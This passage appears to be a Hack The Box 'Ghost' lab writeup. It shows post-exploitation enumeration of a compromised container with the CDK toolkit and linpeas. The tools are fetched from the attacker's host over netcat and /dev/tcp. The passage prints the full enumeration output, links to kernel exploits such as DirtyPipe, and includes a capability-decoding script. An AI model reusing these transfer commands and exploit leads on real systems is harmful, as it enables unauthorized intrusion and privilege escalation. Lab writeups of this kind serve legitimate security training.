CDK - Zero Dependency Container Penetration Toolkit


Conducting an automated enumeration after performing the manual enumeration

cdk is an open-source container penetration toolkit, designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It ships with useful net-tools and many powerful PoCs/EXPs and helps you escape the container and take over the K8s cluster easily.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nc -lvp 2222 < cdk
listening on [any] 2222 ...
connect to [10.10.14.61] from dc01.ghost.htb [10.10.11.24] 50470
 
florence.ramirez@LINUX-DEV-WS01:/dev/shm$ cat < /dev/tcp/10.10.14.61/2222 > cdk
florence.ramirez@LINUX-DEV-WS01:/dev/shm$ chmod 755 ./cdk

Delivery complete

Exec


florence.ramirez@LINUX-DEV-WS01:/var/tmp$ ./cdk eva --full
CDK (Container DucK)
CDK Version(GitCommit): 306f3ced50188ab2c41e0e924c1cde35ecbb520d
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2024/07/16 12:19:58 current dir: /var/tmp
2024/07/16 12:19:58 current user: florence.ramirez uid: 50 gid: 50 home: /home/GHOST/florence.ramirez
2024/07/16 12:19:58 hostname: LINUX-DEV-WS01
2024/07/16 12:19:58 debian debian 12.4 kernel: 5.15.0-113-generic
2024/07/16 12:19:58 Setuid files found:
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/ksu
	/usr/bin/mount
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/su
	/usr/bin/umount
	/bin/chfn
	/bin/chsh
	/bin/gpasswd
	/bin/ksu
	/bin/mount
	/bin/newgrp
	/bin/passwd
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
2024/07/16 12:19:58 sensitive env found:
	SSH_CONNECTION=172.18.0.3 47574 172.18.0.2 22
2024/07/16 12:19:58 sensitive env found:
	SSH_CLIENT=172.18.0.3 47574 22
2024/07/16 12:19:58 sensitive env found:
	SSH_TTY=/dev/pts/1
2024/07/16 12:19:58 service found in process:
	17	1	sshd
2024/07/16 12:19:58 service found in process:
	45	17	sshd
2024/07/16 12:19:58 service found in process:
	57	45	sshd
 
[  Information Gathering - Commands and Capabilities  ]
2024/07/16 12:19:58 available commands:
	find,ps,python3,apt,dpkg,ssh,vi,mount,base64,perl
2024/07/16 12:19:58 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	0000000000000000
	CapEff:	0000000000000000
	CapBnd:	00000000a80425fb
	CapAmb:	0000000000000000
	Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:
 
[  Information Gathering - Mounts  ]
0:51 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/725B6B5II5A6B2BUBPAAR6PVUN:/var/lib/docker/overlay2/l/2MRQIAYMMVQVUUQT6GE6TOSXNX:/var/lib/docker/overlay2/l/7AQAEJZWSPPSU6OKQ2P4QTBILD:/var/lib/docker/overlay2/l/HK62N2BGDDQTAVFTTYYB7B3SFJ:/var/lib/docker/overlay2/l/YPG4YGUYUATS3XUZPBV2EMK7XP:/var/lib/docker/overlay2/l/MVLH5UYXDPXTZCVLFXQASRJ3QT:/var/lib/docker/overlay2/l/YFCODJLKW7KWUAS4HAIPSBRHQ2:/var/lib/docker/overlay2/l/WUKUZKIH63RTIO7QXTVKYC2VK3:/var/lib/docker/overlay2/l/3H27Q5UHV63OSNSQLHC63EGQW2,upperdir=/var/lib/docker/overlay2/1f786bd15fdb20fd89e46cd0032588802eeb98b1169a6003eff9e3c59be75ebb/diff,workdir=/var/lib/docker/overlay2/1f786bd15fdb20fd89e46cd0032588802eeb98b1169a6003eff9e3c59be75ebb/work
0:102 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:103 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:104 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:105 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:97 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:106 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,nr_inodes=286478,inode64
8:2 /var/lib/docker/containers/c2ea6871e69c5314b2aab666e811d390433459358f8f678e6ac65ccebe5fc856/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/c2ea6871e69c5314b2aab666e811d390433459358f8f678e6ac65ccebe5fc856/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/c2ea6871e69c5314b2aab666e811d390433459358f8f678e6ac65ccebe5fc856/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
0:102 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:115 / /proc/acpi ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
0:103 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:103 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:103 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:116 / /proc/scsi ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
0:117 / /sys/firmware ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
0:118 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2024/07/16 12:19:58 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
 
[  Discovery - K8s API Server  ]
2024/07/16 12:20:14 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2024/07/16 12:20:15 failed to dial Alibaba Cloud API.
2024/07/16 12:20:16 failed to dial Azure API.
2024/07/16 12:20:17 failed to dial Google Cloud API.
2024/07/16 12:20:18 failed to dial Tencent Cloud API.
2024/07/16 12:20:19 failed to dial OpenStack API.
2024/07/16 12:20:20 failed to dial Amazon Web Services (AWS) API.
2024/07/16 12:20:21 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2024/07/16 12:20:21 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bashrc - /etc/skel/.bashrc
	/.bash_history - /home/GHOST/florence.ramirez/.bash_history
 
[  Information Gathering - ASLR  ]
2024/07/16 12:20:24 /proc/sys/kernel/randomize_va_space file content: 2
2024/07/16 12:20:24 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2024/07/16 12:20:24 /proc/1/cgroup file content:
	0::/
2024/07/16 12:20:24 /proc/self/cgroup file added content (compare pid 1) :
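The Capabilities block in the cdk output above prints the five capability sets as raw hex masks but only decodes CapEff, which is empty here for the unprivileged user. The script below, added here and not part of cdk or the original writeup, decodes any such mask into capability names using the kernel's bit numbering and compares the bounding set against Docker's default grant; the CDK_CAPS sample is copied from the output above, and the regex helper and DOCKER_DEFAULT constant are this example's own. Run against the CapBnd value 00000000a80425fb it yields exactly the stock Docker set, which tells a defender the container was started with no --cap-add and no --privileged flag.

```python
# Added example: decode the capability masks cdk prints (same format as
# /proc/<pid>/status) and compare the bounding set with Docker's default.
import re

# Bit numbers follow include/uapi/linux/capability.h (CAP_CHOWN = 0, ...).
CAP_NAMES = [
    "CHOWN", "DAC_OVERRIDE", "DAC_READ_SEARCH", "FOWNER", "FSETID", "KILL",
    "SETGID", "SETUID", "SETPCAP", "LINUX_IMMUTABLE", "NET_BIND_SERVICE",
    "NET_BROADCAST", "NET_ADMIN", "NET_RAW", "IPC_LOCK", "IPC_OWNER",
    "SYS_MODULE", "SYS_RAWIO", "SYS_CHROOT", "SYS_PTRACE", "SYS_PACCT",
    "SYS_ADMIN", "SYS_BOOT", "SYS_NICE", "SYS_RESOURCE", "SYS_TIME",
    "SYS_TTY_CONFIG", "MKNOD", "LEASE", "AUDIT_WRITE", "AUDIT_CONTROL",
    "SETFCAP", "MAC_OVERRIDE", "MAC_ADMIN", "SYSLOG", "WAKE_ALARM",
    "BLOCK_SUSPEND", "AUDIT_READ", "PERFMON", "BPF", "CHECKPOINT_RESTORE",
]

# Docker's default capability set (moby oci/defaults.go); anything beyond
# this in CapBnd means the container got --cap-add or --privileged.
DOCKER_DEFAULT = frozenset([
    "CHOWN", "DAC_OVERRIDE", "FOWNER", "FSETID", "KILL", "SETGID", "SETUID",
    "SETPCAP", "NET_BIND_SERVICE", "NET_RAW", "SYS_CHROOT", "MKNOD",
    "AUDIT_WRITE", "SETFCAP",
])

def decode_caps(hex_mask):
    """Return the capability names whose bit is set in a hex mask, lowest bit first."""
    mask = int(hex_mask, 16)
    return [CAP_NAMES[b] if b < len(CAP_NAMES) else "UNKNOWN_%d" % b
            for b in range(mask.bit_length()) if mask >> b & 1]

def parse_cap_block(text):
    """Parse 'CapInh:<tab>hex' style lines (cdk output or /proc/<pid>/status)."""
    return {m.group(1): decode_caps(m.group(2)) for m in
            re.finditer(r"(Cap(?:Inh|Prm|Eff|Bnd|Amb)):\s*([0-9a-fA-F]+)", text)}

def beyond_docker_default(text):
    """Capabilities in the bounding set that Docker would not grant by default."""
    return sorted(set(parse_cap_block(text).get("CapBnd", [])) - DOCKER_DEFAULT)

# Capability lines as printed by cdk on the page (values copied from its output).
CDK_CAPS = """\tCapInh:\t0000000000000000
\tCapPrm:\t0000000000000000
\tCapEff:\t0000000000000000
\tCapBnd:\t00000000a80425fb
\tCapAmb:\t0000000000000000
"""
if __name__ == "__main__":
    for name, caps in parse_cap_block(CDK_CAPS).items():
        print("%s: %s" % (name, ", ".join(caps) or "(none)"))
    print("beyond Docker default:", beyond_docker_default(CDK_CAPS) or "none")
```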

Network


florence.ramirez@LINUX-DEV-WS01:/var/tmp$ ./cdk ifconfig
2024/07/16 12:20:56 [+] run ifconfig, using GetLocalAddresses()
2024/07/16 12:20:56 lo 127.0.0.1/8
2024/07/16 12:20:56 lo ::1/128
2024/07/16 12:20:56 eth0 172.18.0.2/16

172.18.0.2/16

florence.ramirez@LINUX-DEV-WS01:/var/tmp$ ./cdk netstat
2024/07/16 12:21:32 [+] run netstat, using RunNestat()
ipType		connection	localAddr			status			remoteAddr			pid
ipv4		tcp		0.0.0.0:139     		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		127.0.0.11:38951		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		0.0.0.0:22      		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		0.0.0.0:445     		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		172.18.0.2:46090		ESTABLISHED  		10.0.0.254:49669		0
ipv4		tcp		172.18.0.2:53998		ESTABLISHED  		10.0.0.254:445  		0
ipv4		tcp		172.18.0.2:34686		ESTABLISHED  		10.0.0.254:50495		0
ipv4		tcp		172.18.0.2:22   		ESTABLISHED  		172.18.0.3:47574		0
ipv4		udp		0.0.0.0:137     		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.0.2:138  		NONE         		0.0.0.0:0       		0
ipv4		udp		0.0.0.0:138     		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.0.2:137  		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.255.255:137		NONE         		0.0.0.0:0       		0
ipv4		udp		127.0.0.11:37905		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.255.255:138		NONE         		0.0.0.0:0       		0

PEAS


Conducting an automated enumeration after performing the manual enumeration

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nc -lvp 2222 < linpeas_CVE_check.sh
listening on [any] 2222 ...
connect to [10.10.14.61] from dc01.ghost.htb [10.10.11.24] 57010
 
florence.ramirez@LINUX-DEV-WS01:/var/tmp$ cat < /dev/tcp/10.10.14.61/2222 > linpeas_CVE_check.sh
florence.ramirez@LINUX-DEV-WS01:/var/tmp$ chmod 755 linpeas_CVE_check.sh

Delivery complete

Executing PEAS

CVEs


╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

ENV


Container


Entrypoint


DNS


SSH


kadmin